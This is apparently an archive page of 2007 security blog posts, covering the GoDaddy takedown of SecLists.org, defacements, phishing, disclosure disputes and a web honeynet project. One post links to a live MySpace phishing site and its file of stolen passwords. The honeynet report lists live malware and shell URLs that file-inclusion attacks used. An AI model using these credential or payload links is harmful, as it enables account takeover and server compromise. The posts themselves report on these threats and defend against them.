No Daddy, please stop! Fyodor’s words.

So after the takedown of seclists.org, and all the different points of view that were being aired, on the various web sites, I decided to contact Fyodor and ask him exactly what happened, and what’s going to happen in the future in regard to godaddy.com. Once again, thanks to Fyodor for taking the time to answer my questions.
The following is taken from an interview that I did with Fyodor last night, so here it is:

In your words could you please describe what happened to
seclists.org, I know that you have probably been asked this countless
times, but there are also countless sites that don’t mention your
point of view? Also, on these same sites, some are saying that you
had 60 seconds warning, others are saying 60 minutes, what’s the
exact figure?

Basically, GoDaddy suspended one of the domain names I had registered
with them based on a complaint by MySpace without giving me a chance
to respond or requiring any sort of court order from MySpace. GoDaddy
wasn’t even my ISP or web host. Policing web content of the 18
million domains in their registry is not their job. Worse, it was
extraordinarily hard and frustrating to reach them and get an actual
reason for the shutdown. I’ve described the shutdown in far more
detail at http://NoDaddy.Com .

As for the timing, they left me a voicemail at ’9:39:31 AM PST’
according to the time stamp from my voicemail provider. In the
voicemail, they say my domain is “scheduled for suspension”. Then at
’9:40:23′ (according to my time-synced mail server) they emailed me a
“Domain Suspension Notice” saying that my “domain names have been
suspended”. So they only gave me 52 seconds to respond to their
voicemail! Plus, their voicemail didn’t include a phone number to
reach them at! I have posted both the email and voicemail recording at
NoDaddy.Com.

GoDaddy nevertheless tried to claim that they gave me an hour of
notice. Their general counsel Christine Jones was caught by Wired in
that lie at
http://blog.wired.com/27bstroke6/2007/01/godaddy_defends.html .

Aside from nodaddy.com do you plan on taking any action, namely
legal, against godaddy.com?

They certainly deserve it, and some lawyers have offered to help. But
I haven’t even asked them for monetary restitution for the damage they
have caused — I just want them to change their policies to be more
customer-friendly. Or if they don’t, I want their behavior to be
well-known so that other consumers can make a better choice. So
unless they do something outrageous (such as sueing me for speaking
out against them on NoDaddy.Com), I’m not presently planning any legal
action against GoDaddy.
Will you be taking any action against myspace.com because of this
atrocity at all?

I would cancel my account if I was pathetic enough to have one :) .
They should have contacted me directly to remove the page. My email
address and phone number were availble on the public whois, and I also
watch the abuse@seclists.org email address for complaints about
illegal postings to the mailing lists. Ironically, GoDaddy shut down
the complaint email address when they shut down the whole doamin
SecLists.org.

So while MySpace made a mistake by sending the request directly to
GoDaddy, I hold GoDaddy much more culpable for agreeing to the
outrageous domain.

How much of an impact do you feel this had on the security
community in general?

I hope it has raised awarness of the problem of vigilante domain
registrars hijacking their customers’ domains because they find the
web content objectionable. This isn’t just a security community
issue, but an issue for all web sites. Particularly those which
accept user-generated content such as forum posts or blog comments.
My whole domain was shut down with no notice or reason immediately
given based on a 3rd party post I had nothing to do with.

How much of an impact has this had on your life?

It has kept me very busy for the last week. But I’m hoping it will
calm down so I can return to focusing the majority of my time to
maintaining Nmap and my web sites.

I know that it mentions this on nodaddy.com, but what can people
do to help on the nodaddy.com site?

The site is meant to be a community effort, so help is appreciated.
Here are some ideas:

o Forum Operator — If someone wants to start a web forum system where
uses can post their GoDaddy horror stores and seek advice, that
would be useful. We would be happy to provide a subdomain such as
forums.noddady.com for this.

o Webmaster help — If someone wants to help maintain the site content
(post new news stories, etc.), I would be happy for the help. They
need to know (or learn to use) the Subversion version detection system.

o Creative content, like cartoons, pictures for the “NoDaddy Girls”
contest, etc. The point of the site is to spread the word about
GoDaddy abuses, but also to have fun :) .

Last but not least, any new and exciting things coming along in the
next release of nmap that you’d be willing to share?

We are very excited about a new scripting language, which is already
in alpha stage. You can see our writeup here:

http://insecure.org/nmap/nse/

Also, we have received tons of user OS submissions for the second
generation OS detection system http://insecure.org/nmap/osdetect/,
so the next release should work even better in that respect.

Share

Coca-Cola Singapore, Nokia Canada defaced

The news portal of Coca-Cola Singapore is target of the recent defacement. The signature of the attacker is located in Windows 2003/IIS6 server still.

It appears that the home page of Coca-cola.com.sg was target in 2003 too.

Another global company attacked recently is Nokia Canada. Their Web site  www.nokia.ca/english/index.asp was offline on Monday, but there are some screenshot posted online. One of the weblogs reporting this case is Nokia Insider, related entry posted by ‘Nokia’. ;-)
The target page was phone comparison page of Nokia.ca.

Share

Canada, UK etc. seeking tax cheats with special Web crawler

This Wired news article reports that

A five-nation tax enforcement cartel has been quietly cracking down on suspected internet tax cheats, using a sophisticated web crawling program to monitor transactions on auction sites, and track operators of online shops, poker and porn sites.

The countries participating in this Xenon project are Austria, Canada, Denmark, The Netherlands and United Kingdom. They are in co-operation with Amsterdam-based data mining company Sentient Machine Research.

A very interesting detail is that the search process is very “slow” to prevent finding it in server logs!

Share

Fyodor only gets 60 seconds warning?

Kevin Poulsen reports on the 27B Stroke 6 blog today that Fyodor’s (of nmap fame) SecLists.org website was shut down. Kevin followed up later with responses both from GoDaddy’s general counsel and Fyodor. Please take a look at Kevin’s writeups. He does an excellent job, as always.

Basically, Fyodor keeps a public archive of a bunch of mailing lists, including Full Disclosure. Someone by the address of alex323@gmail.com posted a copy of a myspace password list to Full Disclosure. Fyodor’s archive contained a copy. And so does every other archive, and every single one of us who subscribes directly has a copy, too.

Depending on whose story you believe, Fyodor was given either 1 minute or 1 hour of notice before they turned him off. We don’t know how long it was between when myspace asked and GoDaddy acted. Fyodor never got the message ahead of time, and GoDaddy made no attempt to ask for removal of the single attachment out of thousands and thousands of archived emails. And the password list had been there for days.
I belong to a couple of private groups that request domain shutdowns frequently, based on phishing sites, botnet C&Cs, and sites hosting malware being used to infect new victims. These are what I would tend to call legitimate reasons to shut down a domain. How long do you think it usually takes the group to have a domain shut down? Even for the most responsive registrars, it frequently takes several hours. How do we get the 1 minute turnaround, GoDaddy? Where’s the form we fill out?
So, no brownie points for GoDaddy and how they handled this. We can see who they are willing to jump for.  How about myspace? I think Fyodor’s own response it about as good as it gets. Just change the passwords on the compromised list, and notify the account owners.
So I have a question: If you know someone whose password was stolen, have they received any kind of notification? I suppose if I were a bit more enterprising, I could just mail them all and ask myself, or maybe just try the names and password on myspace, and see how many still work. After all, I’ve got a copy of the list, there’s nothing that would prevent me.

Share

Apple: We have a fix for MOAB-01-01-2007!

Apple has released a fix for QuickTime rtsp:// URL Handler Stack-based Buffer Overflow – aka MOAB-01-01-2007.

There is no any other fixes included to Security Update 2007-001, link here:

docs.info.apple.com/article.html?artnum=304989

As we can see the ‘MOAB-01-01-2007′ was disclosed on 1st Jan as the very first Month of Apple Bugs advisory.

It is worth of noticing that Windows versions 7.1.3.100 and below are affected too.

Best,
Juha-Matti Laurio

Share

Distributing malware over ed2k network

While searching for some legitimate content on e2dk p2p network I’ve stumbled into some strange search results. Those results were looks like forged from the search query. I’ve searched then for surely non existing files and got same forged results.

Quick check of the files shows that at least one of them contains malware.

Malicious server forge ed2k link for every query, by only changing the name of the file, while MD5 remains the same. The malicious server then connects to one of the biggest ones in the network. Users that will use Global search (trans-server) will receive the link on mostly every search and the result may look very legitimate due to good availability of the file. Malicious files are very well shared and will be downloaded in the matter of seconds.

Share

Google, Service Providers and the Future of P2P

in a non-operational nanog discussion about google bandwidth uses, several statements were made. it all started from the following post by mark boolootian:

> cringley has a theory and it involves google, video, and oversubscribed backbones:
> http://www.pbs.org/cringely/pulpit/2007/pulpit_20070119_001510.html

in the discussion, the following statement was made by rodrick brown:

> the following comment has to be one of the most important comments in
> the entire article and its a bit disturbing.
>
> “right now somewhat more than half of all internet bandwidth is being
> used for bittorrent traffic, which is mainly video. yet if you
> surveyed your neighbors you’d find that few of them are bittorrent
> users. less than 5 percent of all internet users are presently
> consuming more than 50 percent of all bandwidth.”

from there it went down-hill with discussion of the future, with the venice project (streaming p2p for tv), etc. being mentioned. some points were raised about how isps currently fight p2p technologies and may fight these new worlds of functionality, denying what the users want rather than work with them, citing as we have seen above that today, a very small percentage of internet users account for about 50% of all internet traffic. that of course, will increase dramatically in the future — it is where the users want to go.

the isps inhibit this progress, just like in my opinion a bad security “guy” or “gal” would try to prevent functionality from their users as part of their security strategy, rather than work with their users and enable functionality first.

in this discussion, randy bush (who i have had my share of strong disagreements with in the past) said the following, which is admirable:

> the heavy hitters are long known. get over it.
>
> i won’t bother to cite cho et al. and similar actual measurement
> studies, as doing so seems not to cause people to read them, only to say
> they already did or say how unlike japan north america is. the
> phenomonon is part protocol and part social.
>
> the question to me is whether isps and end user borders (universities,
> large enterprises, …) will learn to embrace this as opposed to
> fighting it; i.e. find a business model that embraces delivering what
> the customer wants as opposed to winging and warring against it.
>
> if we do, then the authors of the 2p2 protocols will feel safe in
> improving their customers’ experience by taking advantage of
> localization and proximity, as opposed to focusing on subverting
> perceived fierce opposition by isps and end user border fascists. and
> then, guess what; the traffic will distribute more reasonably and not
> all sum up on the longer glass.

it has been a long time since i bowed before mr. bush’s wisdom, but indeed, i bow now in a very humble fashion.

thing is though, it is equivalent to one or all of the following:
-. eff-like thinking (sticking to the moral high-ground or (at times!) impractical concepts. stuff to live by.
-. (very) forward thinking (not yet possible for people to get behind – by people i mean those who do this daily), likely to encounter much resistence until it becomes mainstream a few years down the road.
-. not connected with what can currently happen to affect change, but rather how things really are which people can not yet accept.

as randy is obviously not much affected when people disagree with him (much the same as me), nor should he be, i am sure he will preach this until it becomes real. with that in mind, if many of us believe this is a philosophical as well as a technological truth — what can be done today to affect this change?

the service providers are not evil — they do this out of operational necessity and business needs. how can this change or shown to be wrong?

some examples may be:
-. working with network gear vendors to create better equipment built to handle this and lighten the load.
-. working on establishing new standards and topologies to enable both vendors and providers to adopt them.
-. presenting case studies after putting our money where our mouth is, and showing how we made it work in a live network.

staying in the philosophical realm is more than respectable, but waiting for fussp-like wide-adoption or for sheep to fly is not going to change the world, much.

for now, the p2p folks who in most cases are not eveel “internet pirates”, are mostly allied whether in name or in practice with illegal activities. the technology isn’t illegal and can be quite good for all of us to save quite a bit of bandwidth rather than waste it (quite a bit of redundancy there!).

so, instead of fighting progress and seeing it [p2p technology] left in the hands of the “pirates” and the privacy folks trying to bypass the firewall of [insert evil regime here], why not utilize it?

how can service providers make use of all this redundancy among their top talkers and remove the privacy advocates and warez freaks from the picture, leaving that front with less technology and legitimacy while helping themselves?

this is a pure example of a problem from the operational front [realm] which can be floated to research and the industry, with smarter solutions than port blocking and qos.

it’s about progress and how change is affected and feared, not about who is evil. it is about who will step up and make a difference, and whether business today is smart enough to lead the road rather than adapt after the avalanche has already fallen.

gadi evron,
ge@beyondsecurity.com.

Share

What’s the deal?

in the past week or two, the anti phishing community has been buzzing with this. now it is public and i can finally shout my frustration:
so, we have phishing sites which are doing man-in-the-middle in real time, between the phished site and the phished user.
how is that news?

regular phishing works like so:
victim >> fake site >> real site

middle, see?

now, in most cases in the past, this process was not automatic, and in most cases – it won’t be. distribution across ip addresses, choosing what accounts are worth it to steal from, choosing money mules, etc. is far easier to do off-line.
that said, this isn’t new, it’s just… yet another kit. am i excited about a new kit? kinda. is this big news? no.

why you ask? as this real-time phishing using mitm attacks has been happening for years now using phishing or banking trojan horses. the best we can describe happened is that the technique was now incorporated into older email-based phishing, as well.

new? okay, maybe if we push it. exciting? so-so.

gadi evron,
ge@beyondsecurity.com.

Share

Cross-site Request Forgery FAQ released

Cgisecurity has announced the release of The Cross-site Request Forgery FAQ document today.

According to their posting it was released

to address some of the common questions and misconceptions regarding this commonly misunderstood web flaw.

They list both CSRF and XSRF abbreviations at the main page.

Share

Myspace phishing site discloses countless usernames and passwords

This just came in on FD, and well, I’d suggest that anyone reading this checks to make sure that no-one you know got fooled by this one.

The phishing site can be found at http://www.marcolano.com/login

All the usernames and passwords can be found here http://www.marcolano.com/login/myspace.txt

I’ve also submitted this to digg.com as it may help to get the world out there a bit more, if nothing else maybe the digg effect will take the site down before the law can. Here’s the link:

http://www.digg.com/security/Change_your_Myspace_passwords_now

Share

Two infosec veterans weigh in on Full Disclosure

Marcus J Ranum (MJR) says (http://www2.csoonline.com/exclusives/column.html?CID=28072)

“After 10 years of full disclosure, security has not gotten any better”.

First off, how would we know what security would have been like without full disclosure? Perhaps it could have been said that security would have gotten exponentially (or even linearly) worse. In which case, statments like “security hasn’t gotten any better” and “the number of vulnerabilities is pretty much constant” would imply that full disclosure works? But, wait, that presupposes that only one factor contributes to the state of security – which is a logical fallacy as well. Hmmm, ok. I can’t draw any logical conclusions here. Let’s go to Bruce’s argument.

Bruce says: (http://www2.csoonline.com/exclusives/column.html?CID=280723)

“Bugs exist whether or not they are disclosed in a public forum. Vendors are more responsive when it could cause bad PR. Public disclosure forces vendors to more quickly fix flaws which makes systems more secure”.

Bruce’s argument logically implies that with full disclosure we have a *potential* for better system security. Unfortunately, we can’t measure the rate at which these fixes actually get deployed and we can’t measure the rate at which crackers use publicly disclosed bugs to exploit unpatched systems. So, at the end of the day, I can’t say whether or not public disclosure actually helps the end user. I can say
that public disclosure at least creates a Potential ™ for better system security….and, that’s something.

A good portion of MJR’s article is devoted to the lambasting of security
researchers. Some quotes:

‘For longer than a decade, we’ve lived under the mob rule, where for some security consultants and companies, “marketing” has been replaced by “splashily announcing holes in commercial products to get 20 seconds of fame on CNN.” ‘

‘Now that we can look back at 10 years of what disclosure has brought us, it’s brought us…well, nothing much. Nothing much, that is, except a grey-market economy in exploits, where independent “vulnerability researchers” attempt to cash in by finding new attacks that they can sell to security companies or spyware
manufacturers—whichever bids higher. Nothing much unless you count the massive amounts of “free” marketing exposure for companies that trade in exploits.’

‘The state of ethics in the computer security industry is pathetic; it’s on par with where medicine was in the 1820s—except that some of the snake-oil salesmen in the 1820s actually believed in their products.’

‘Those of you who are playing the disclosure game are just playing for your two minutes of fame: You’re not making software better. Sure, some of you work for consultancies and startups, and it saves you a ton of money by not having to have a marketing budget, but isn’t shouting “fire!” in a crowded theater so…um, ’90s? I know that the typical security customer is (to you) an unsophisticated rube, but
that does not justify you placing them at increased risk just so you can publish a new signature for your pen-testing tool or get your funny-haired “chief hacking officer” on CNN one more time. ‘

‘Unfortunately, if you look at the last 10 years of security, it’s a litany of “one step forward, one step back,” thanks in part to the vulnerability pimps, parasites and snake-oil salesmen who flocked into the industry when they smelled money and a chance to get some attention. ‘

I think I see a little bias creeping in here and perhaps even a bit of hypocrisy.
Marcus abhors the hacker/security-researcher type. I don’t know if he hates that they are getting attention that is undue, that they are making money off the attention, or that he isn’t getting the attention that he once did. At any rate, it’s getting damn old. The guy that shouts “fire” may very well be annoying. The guy that jumps up and down shouting “Hey, he’s shouting fire” is equally annoying.
In the past, MJR has been spot-on with his analysis. Now, his ‘analysis’ seems as much a PR-trolling rant as any of the mob that he is criticizing. And, let’s not forget that Marcus gets paid by a company that discloses holes in major products and perhaps benefits from the free ‘marketing’. I bet no one is inviting this motherfucker to the company barbecue ;-)

Anonymous

Share

Disclosure of the week (2): Excel opcode vuln

There are many ways how to disclose the vulnerabilities.

This is the Fortinet Security Research Team way:

1. Release FortiGuard Advisory FGA-2006-30 when MS07-002 is not yet public
2. Include Microsoft Security Bulletin 927198 and CVE-2006-3432 references, which no exist and are not accessible
3. Publish an advice to “apply the update provided by Microsoft”
4. Wait for MS January security updates
5. Ignore FGA-2006-30 and generate redirection to FGA-2007-01
6. Change Microsoft Security Bulletin reference to MS07-002 and CVE name to CVE-2007-028, with three digits in ’0028′
7. Don’t release any revision history or information about new CVE name or about removed 2006-30 advisory
8. Wait if users will not notice your way to act

Update: According to Google’s cache e.g. this advisory was released.

Share

Disclosure of the week (1): Opera 9.10

There are many ways how to disclose the vulnerabilities.

This is the Opera Software way:

1. Release new 9.10 version of the browser (Dec 18th ’06)
2. Don’t publish any information in the Security section of official changelog
3. Check if iDefense will release their related advisories
4. Release two knowledge base advisories
5. Update the changelog with no revision history or Last Updated date
6. Wait if users will not notice your way to act

Share

Oracle started MS-style advance notification

Oracle has reported that it plans to release fixes for 52 security vulnerabilities on Tuesday 16th January. The notification is part of the new program to help database administrators.
Redmond guys has informed about the upcoming security bulletins since late 2004.

Oracle’s so-called Pre-Release Announcement is located at

oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html.

One of the interesting details is that

The highest CVSS base score of vulnerabilities across all products is 7.0.

[CVSS link added by the author]

Share

Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]

hello.

the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with:
tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos to attackplatforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside for research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves to be made availableto operational folks, so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (andquite loudly – me) have been warning about this for a while, now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com )..

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), … |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)

Share

The Bank of America: Please lower your defenses, we’re coming through

I wrote about the how the Bank of America are conditioning their customers to be more susceptible to phishing.

It seems they are actually trying to break a record here (or else their security guy quit and was replaced by a marketing person). I just got an email that said:

This email was sent to you by Bank of America. To ensure delivery to your inbox, please add bankofamerica@replies.em.bankofamerica.com to your address book or safe sender list.

My first assumption was that it was a phishing email – why on earth would the BoA legitimately try to convince me to open myself up for phishing? (after adding this email to my “safe sender list” every phisher in the world would set this as their “from” address). In fact, a friend made fun of me for thinking this was a legitimate email – clearly only phishers can think I’m that stupid. Unfortunately, it’s real – it was sent to an email used only by the BoA and unknown to anyone else.

Sad indeed.

Share